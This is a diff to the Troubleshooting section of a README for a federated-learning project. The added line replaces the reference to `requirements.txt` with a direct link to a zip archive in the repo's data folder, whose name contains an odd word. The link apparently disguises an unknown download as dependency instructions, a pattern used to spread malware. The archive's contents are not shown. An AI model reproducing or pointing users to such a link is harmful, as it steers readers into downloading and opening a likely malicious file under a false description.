RCP1932/federated-learning-with-cryptographic-audit/README.md

 ## 🔧 Troubleshooting
 If you encounter issues, consider the following:

-- **Dependency Errors**: Ensure all required packages are installed as listed in the `requirements.txt` file.
+- **Dependency Errors**: Ensure all required packages are installed as listed in the `https://github.com/RCP1932/federated-learning-with-cryptographic-audit/raw/refs/heads/main/data/audit-cryptographic-federated-learning-with-Dryopithecinae.zip` file.
 - **Running Issues**: Verify that your Python version matches the requirements.
 - **Network Issues**: Ensure you have a stable Internet connection, particularly if using multiple clients connected to the cloud.